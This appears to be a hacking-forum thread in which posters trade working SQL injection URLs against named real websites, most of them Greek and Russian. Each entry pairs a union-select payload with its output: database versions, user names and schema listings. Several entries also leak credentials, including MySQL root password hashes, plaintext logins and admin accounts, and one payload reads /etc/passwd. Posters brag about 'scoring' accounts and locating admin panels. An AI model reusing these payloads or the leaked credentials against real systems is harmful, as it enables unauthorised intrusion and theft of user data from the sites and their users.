http://www.sieve.gr/gr/news.php?id=-142+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4/*
4.1.22-standard/sieve@localhost/sieve_gr
There is a users table. I couldn't work out its columns.
-----------------------------------------------------------------------
http://www.x-plorer.gr/news.php?id=-8+union+select+1,2,concat(user,char(58),password),4,5+from+mysql.user/*
root:*046A241131BA9D25793B8012B8DCA213827E3DB9
All tables:
http://www.x-plorer.gr/news.php?id=-8+union+select+table_name,2,3,4,5+from+information_schema.tables/*
All columns:
http://www.x-plorer.gr/news.php?id=-8+union+select+column_name,2,3,4,5+from+information_schema.columns/*
There is also a phpBB forum there ))

http://www.jetskiworld.gr/news.php?id=-626+union+select+1,2,3,4,concat_ws(0x2f,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*
4.1.20-log/[email protected]/331329_jetskiworld
-----------------------------------------------------------------------
http://www.sedici.gr/news.php?id=-2+union+select+1,2,3,4,5,6,concat_ws(0x2f,version(),user(),database()),8,9/*
4.1.19-standard-log/sedicig@localhost/sedicig_db
Turn your speakers up (the site plays music that is just right for hacking) and brute-force the tables and columns ))
-----------------------------------------------------------------------
http://www.naserron.gr/news.php?id=-197+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4,5/*&sub=show
5.0.33-log/naserron@localhost/naserron
All tables:
http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,table_name,5+from+information_schema.tables/*&sub=show
All columns:
http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,column_name,5+from+information_schema.columns/*&sub=show
-----------------------------------------------------------------------
http://www.rea.org.gr/gr/news.php?id=-72+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5/*
4.1.22-standard/reaorg@localhost/reaorg_1
There is a users table. I couldn't work out the columns.
-----------------------------------------------------------------------
http://www.omase.gr/gr/news.php?id=-12+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------
http://www.todaneio.gr/news.php?id=-181+union+select+1,2,3,CONVERT(concat_ws(0x3a,version(),user(),database())+using+latin1),5,6,7,8,9,10,11,12,13,14/*
4.1.14:daneio@localhost:todaneio

http://www.alpharent.gr/gr/news.php?id=17+union+select+1,2,3,4+from+users/*
-----------------------------------------------------------------------
http://www.alogoskoufis.gr/news.php?version=gr&id=-184+union+select+1,concat_ws(0x2f,version(),user(),database()),3/*&view=more
4.1.22-standard/alogos_user@localhost/alogos_db
-----------------------------------------------------------------------
http://www.silvestridis.gr/news.php?id=-1+union+select+1,%20%20concat_ws(0x2f,version(),user(),database()),3,4,5/*
4.1.22-standard/silvestr_yiannos@localhost/silvestr_silvestridis
There is a users table.

http://www.davinciinstitute.com/page.php?ID=299'+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5,6+from+inform ation_schema.columns/*
5.0.42/davinci@localhost/davinciinstitute_com
--------------------------------------------------------------------
http://www.bigrap.ru/index.php?mod=multimedia&action=music&album_id=-12+union+select+1,null,concat_ws(0x3a,version(),database(),user()),4,5,6,concat_ws(0x3a,name,pass),8,9,10,11+from+sla mchik_rap.users+limit+3,7/*
Login:saniol pass:dancer2j
5.0.45-community:slamchik_rap:slamchik_slam@localhost

http://www.newera.com.na/page.php?id=25+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6/*
spacetravel.tomsk.ru
HTML: http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,3,4,5,6/*&start=0
HTML: http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6/*&start=0
USER:spacetravelwww@localhost
VERSION:4.0.26
DATABASE:spacetravelwww

Code: http://askort.com/?item_id=1+and+2=0+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4/*
USER : maxivanov_askort@localhost
VERSION : 4.1.11
DATABASE : maxivanov_askort

bravotour.ru
HTML: http://www.bravotour.ru/cont.php?id=-186+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*
USER:bravotou_bravo@localhost
VERSION:4.1.22-standard-log
DATABASE: bravotou_bravobase
rsci.ru
HTML: http://www.rsci.ru/smi/?id=10204+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
USER:[email protected]
VERSION:4.0.27-log
DATABASE:rsci
HTML: http://www.rsci.ru/smi/?id=10204+union+select+0,concat(id,0x3a,name,0x3a,passwd)+from+users+limit+2,2/*
10:administrator:.hbq
2:Юрий:.hbq
HTML: http://www.rsci.ru/admin/

http://mercury-sochi.ru/news/index.php?type=rn&newsid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10/*
4.1.22/merc16/merc16@localhost
----------------------------------------------------------------------------
http://www.home-collection.ru/catalog.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
5.0.45-log/u12151/[email protected]
----------------------------------------------------------------------------
miheeff.net
http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,version(),database(),user()),2,3/*
5.0.33/db5179d/us5179d@localhost
http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,login,pass),2,3+from+logins+limit+2,1/*
login/password alia/zzzxxx

http://www.dukemednews.org/news/article.php?id=10059+union+select+0,1,2,3,user,password,6,7+from+mysql.user/*
Score ))). First time I've managed to do something, lol ))) thanks, everyone =)

http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email),2+from+top_user+limit+0,1/*
http://www.wordtec.com/TopSites/rate.php?site=-1+union+select+concat_ws(0x3a,database(),user()),2/*

Code: http://www.linspire.com/linspire_letter_archives.php?id=1+and+2=0+union+select+1,concat_ws(0x3a,version(),user()),3,4/*
version : 4.0.27-standard-log
user : [email protected]

www.chatelet-theatre.com
HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
4.1.20:root@localhost:chatelet
HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+mysql.user/*
root:3def4e5361e65bde (user: pass(hash)) (http://www.chatelet-theatre.com/admin/)
HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

http://www.dukemednews.duke.edu/news/article.php?id=-801+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+FROM+mysql.user/*
http://www.sportingwheelies.org.au/
I didn't find the admin panel, but you can get about ten accounts out of it (though what the hell they're good for without an admin panel is a big question xD).

http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/*
I worked out the fields, but what to do next, no idea.

http://forum.antichat.ru/showpost.php?p=552492&postcount=4446
and the thread needs to be cleaned of reposts now and then too...
Code: http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat_ws(0x3a,user_login,password,email,user_id),4,5,6,7,8,9+from+members+limit+0,1/*
Code: http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9+from+phpbb_users+limit+1,1/*

http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=@@version
'Microsoft SQL Server 2000
http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=(select+top+1+cast(login_name+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)%2B%27%3A%27%2Bcast(email_address+as+nvarchar)%20from%20admin_logins)
http://www.kathyspies.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2000
http://tlcwalford.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2005
http://www.titans-consulting.com/anndetails.asp?id=1+or+1=@@version
'Microsoft SQL Server 2005

www.respectfamily.com - Respect Records Digital (Drum & Bass)
Code: http://www.respectfamily.com/index.php?mod=members&op=viewmember&id=-41+union+select+0,1,2,3,4+from+members/*